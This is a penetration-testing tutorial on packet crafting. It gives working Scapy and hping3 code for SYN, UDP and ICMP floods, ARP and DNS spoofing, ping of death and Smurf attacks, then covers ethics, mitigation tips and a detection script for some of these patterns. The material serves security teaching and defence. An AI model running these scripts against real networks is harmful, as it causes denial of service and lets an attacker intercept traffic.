Attack Scenarios

Packet crafting allows penetration testers to create custom network packets for various types of attacks. Here are a few common attacks that can be performed on a network using packet crafting, along with brief explanations and sample commands using tools like Scapy and Hping3.

1. TCP SYN Flood Attack

Objective: Overwhelm a target system with a flood of TCP SYN packets, exhausting resources and causing a denial of service (DoS).

Tools: Scapy, Hping3

Using Scapy:

from scapy.all import *

target_ip = "192.168.1.1"
target_port = 80

while True:
    packet = IP(dst=target_ip)/TCP(dport=target_port, flags="S")
    send(packet, verbose=0)

Using Hping3:

hping3 -S 192.168.1.1 -p 80 --flood

2. UDP Flood Attack

Objective: Flood a target with UDP packets, consuming bandwidth and causing a denial of service.

Tools: Scapy, Hping3

Using Scapy:

from scapy.all import *

target_ip = "192.168.1.1"
target_port = 53

while True:
    packet = IP(dst=target_ip)/UDP(dport=target_port)
    send(packet, verbose=0)

Using Hping3:

hping3 -2 192.168.1.1 -p 53 --flood

3. ICMP Flood Attack

Objective: Overwhelm a target with ICMP Echo Request (ping) packets, causing a denial of service.

Tools: Scapy, Hping3

Using Scapy:

from scapy.all import *

target_ip = "192.168.1.1"

while True:
    packet = IP(dst=target_ip)/ICMP()
    send(packet, verbose=0)

Using Hping3:

hping3 -1 192.168.1.1 --flood

4. ARP Spoofing/ARP Cache Poisoning

Objective: Send spoofed ARP messages to associate the attacker's MAC address with the IP address of another host, allowing interception or modification of traffic.

Tools: Scapy

Using Scapy:

from scapy.all import *

target_ip = "192.168.1.10"
spoof_ip = "192.168.1.1"
target_mac = "aa:bb:cc:dd:ee:ff"

packet = ARP(op=2, pdst=target_ip, psrc=spoof_ip, hwdst=target_mac)
send(packet, verbose=0)

5. DNS Spoofing

Objective: Send fake DNS responses to redirect a target's traffic to a malicious site.

Tools: Scapy

Using Scapy:

from scapy.all import *

target_ip = "192.168.1.10"
target_port = 53
fake_ip = "192.168.1.100"

dns_response = IP(dst=target_ip)/UDP(dport=target_port)/DNS(id=12345, qr=1, aa=1, qd=DNSQR(qname="example.com"), an=DNSRR(rrname="example.com", rdata=fake_ip))

send(dns_response)

6. Ping of Death

Objective: Send oversized ICMP packets to crash or destabilize the target system.

Tools: Scapy

Using Scapy:

from scapy.all import *

target_ip = "192.168.1.1"

packet = IP(dst=target_ip)/ICMP()/("X"*60000)
send(packet)

7. Smurf Attack

Objective: Use ICMP echo requests with a spoofed source address to flood a target with ICMP replies from multiple devices on a network.

Tools: Scapy

Using Scapy:

from scapy.all import *

broadcast_ip = "192.168.1.255"
target_ip = "192.168.1.1"

packet = IP(src=target_ip, dst=broadcast_ip)/ICMP()
send(packet, count=100)

Ethical Considerations

  • Authorization: Always obtain explicit permission before performing any of these attacks.

  • Controlled Environment: Conduct tests in a controlled and isolated environment to avoid unintentional damage.

  • Responsible Disclosure: Report any vulnerabilities found responsibly to the appropriate stakeholders.

Mitigation Tips

  • Network Segmentation: Properly segment networks to limit the impact of attacks.

  • Intrusion Detection/Prevention Systems: Deploy IDS/IPS to detect and prevent malicious activities.

  • Regular Audits: Perform regular security audits to identify and remediate vulnerabilities.

  • Access Controls: Implement strong access controls and authentication mechanisms to protect network devices and systems.
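To make the IDS/IPS tip concrete, here is a detection sketch added as an example (it is not part of the original page). It flags three of the patterns above: a changed IP-to-MAC binding (ARP cache poisoning), ICMP echo requests sent to the subnet broadcast address (Smurf), and a SYN rate above a threshold (SYN flood). The event format, the function name detect, and the thresholds are assumptions chosen for illustration, and the sample events are constructed, not captured traffic.

```python
from collections import defaultdict, deque
import ipaddress

# Constructed sample events (not captured traffic): (time_s, kind, fields)
EVENTS = [
    (0.0, "arp_reply", {"ip": "192.168.1.1", "mac": "00:11:22:33:44:55"}),
    (1.0, "arp_reply", {"ip": "192.168.1.1", "mac": "aa:bb:cc:dd:ee:ff"}),
    (2.0, "icmp_echo", {"src": "192.168.1.1", "dst": "192.168.1.255"}),
] + [(3.0 + i * 0.005, "tcp_syn", {"dst": "192.168.1.1", "dport": 80})
     for i in range(150)]

def detect(events, net="192.168.1.0/24", syn_limit=100, window=1.0):
    """Return a list of (time, alert) tuples for a time-ordered event stream."""
    alerts = []
    arp_table = {}                   # first-seen IP -> MAC binding
    syn_times = defaultdict(deque)   # (dst, dport) -> SYN timestamps in window
    flooding = set()                 # targets already alerted on
    broadcast = str(ipaddress.ip_network(net).broadcast_address)
    for t, kind, f in events:
        if kind == "arp_reply":
            # A reply that contradicts the known binding suggests poisoning.
            known = arp_table.setdefault(f["ip"], f["mac"])
            if known != f["mac"]:
                alerts.append((t, f"arp-binding-change {f['ip']} {known}->{f['mac']}"))
        elif kind == "icmp_echo" and f["dst"] == broadcast:
            # The claimed source is the likely victim of the amplified replies.
            alerts.append((t, f"icmp-echo-to-broadcast claimed-src={f['src']}"))
        elif kind == "tcp_syn":
            key = (f["dst"], f["dport"])
            q = syn_times[key]
            q.append(t)
            while q and t - q[0] > window:   # drop SYNs older than the window
                q.popleft()
            if len(q) > syn_limit and key not in flooding:
                flooding.add(key)            # alert once per target
                alerts.append((t, f"syn-rate-exceeded {key[0]}:{key[1]}"))
    return alerts

if __name__ == "__main__":
    for when, alert in detect(EVENTS):
        print(f"{when:6.2f}s  {alert}")
```

In production the first-seen ARP binding would be replaced by a trusted source such as DHCP snooping data or static entries, since the first reply observed may itself be forged.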

By understanding these attacks and responsibly testing them, you can help identify and mitigate vulnerabilities, strengthening overall network security.
